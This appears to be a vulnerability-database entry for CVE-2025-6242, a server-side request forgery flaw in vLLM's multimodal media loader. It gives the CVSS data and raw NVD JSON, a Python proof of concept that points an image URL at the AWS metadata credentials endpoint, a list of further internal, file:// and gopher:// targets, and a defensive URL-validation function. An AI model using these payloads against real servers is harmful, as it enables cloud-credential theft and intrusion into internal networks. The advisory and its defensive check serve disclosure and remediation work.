Security Vulnerability Report
CVE-2025-6242 CVSS 7.1 HIGH

CVE-2025-6242

Published: 2025-10-07 20:15:36
Last Modified: 2026-04-15 00:35:42

Description

A Server-Side Request Forgery (SSRF) vulnerability exists in the MediaConnector class within the vLLM project's multimodal feature set. The load_from_url and load_from_url_async methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H

Configurations (Affected Products)

No configuration data available.

vLLM < latest fixed release (exact version number pending official confirmation)
All affected versions of vLLM that include the multimodal feature module containing the MediaConnector class

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-6242 - vLLM MediaConnector SSRF Proof of Concept
# This PoC demonstrates the SSRF vulnerability in vLLM's MediaConnector class
# The vulnerability exists in load_from_url and load_from_url_async methods

import requests
import json

# Target vLLM server endpoint
VLLM_SERVER = "http://target-vllm-server:8000"

# Step 1: Authenticate to obtain access token (low privilege required)
# In a real scenario, obtain a valid API key or session token
auth_headers = {
    "Authorization": "Bearer <your_api_token>",
    "Content-Type": "application/json"
}

# Step 2: Craft a malicious request with SSRF payload
# The URL points to internal cloud metadata service
ssrf_payload = {
    "model": "vllm-multimodal-model",
    "messages": [
        {
            "role": "user",
            "content": [
                {
                    "type": "image_url",
                    "image_url": {
                        # Malicious URL pointing to AWS metadata service
                        "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
                    }
                },
                {
                    "type": "text",
                    "text": "Describe this image"
                }
            ]
        }
    ],
    "max_tokens": 300
}

# Step 3: Send the request to trigger SSRF
# The vLLM server will fetch the URL from the internal metadata service
response = requests.post(
    f"{VLLM_SERVER}/v1/chat/completions",
    headers=auth_headers,
    json=ssrf_payload
)

# Step 4: Analyze the response for leaked information
print("Status Code:", response.status_code)
print("Response:", json.dumps(response.json(), indent=2))

# Alternative targets for SSRF exploitation:
# - http://127.0.0.1:8080/admin (local services)
# - http://192.168.1.1/ (internal network devices)
# - http://[::1]/ (IPv6 localhost)
# - file:///etc/passwd (local file access via file protocol)
# - gopher://internal-service:6379/ (Redis exploitation via gopher protocol)
```
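The host restriction the description says the media loader lacks, as an added defensive example written for this report and not vLLM's own code: it admits only http/https URLs whose host resolves exclusively to public addresses, which rejects every destination type listed above (cloud metadata, loopback, private ranges, IPv6 localhost, file:// and gopher://). The resolver is injectable so the check runs offline; the host names and addresses used for testing are constructed.

```python
# Added example for this report, not vLLM's own code: the host check a media
# loader should apply before fetching a user-supplied URL. It rejects every
# destination type named above: cloud metadata, loopback, RFC 1918 ranges,
# IPv6 localhost, and non-HTTP schemes such as file:// and gopher://.
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(host: str) -> List[str]:
    """Resolve a hostname to all of its addresses; a lookup error yields [] (fail closed)."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def is_public_ip(ip_text: str) -> bool:
    """True only for globally routable unicast addresses. is_global is False for
    private, loopback, link-local (169.254.0.0/16 covers the metadata service)
    and reserved ranges; multicast is excluded separately."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return ip.is_global and not ip.is_multicast


def is_safe_media_url(url: str, resolver: Callable[[str], List[str]] = default_resolver) -> bool:
    """Return True only if the scheme is http/https and every address the host
    resolves to is public. The resolver is injectable so it can be tested offline."""
    try:
        parts = urlsplit(url)
    except ValueError:          # e.g. a malformed IPv6 literal in brackets
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = parts.hostname
    try:
        ipaddress.ip_address(host)   # IP literal such as 127.0.0.1 or [::1]
        addresses = [host]
    except ValueError:
        addresses = resolver(host)   # DNS name: check every A/AAAA answer
    # Fail closed: an unresolvable name or any single internal answer rejects the URL,
    # so a DNS record that mixes public and private addresses cannot slip through.
    return bool(addresses) and all(is_public_ip(a) for a in addresses)
```

This is a pre-flight check only: because HTTP clients follow redirects and DNS answers can change between check and fetch, a production loader should also disable redirects (or re-validate each hop) and connect to the address it validated.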

References

Weakness: CWE-918 (Server-Side Request Forgery)
https://access.redhat.com/security/cve/CVE-2025-6242
https://bugzilla.redhat.com/show_bug.cgi?id=2373716

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-6242",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-07T20:15:36.187",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Server-Side Request Forgery (SSRF) vulnerability exists in the MediaConnector class within the vLLM project's multimodal feature set. The load_from_url and load_from_url_async methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://access.redhat.com/security/cve/CVE-2025-6242",
        "source": "[email protected]"
      },
      {
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373716",
        "source": "[email protected]"
      }
    ]
  }
}
```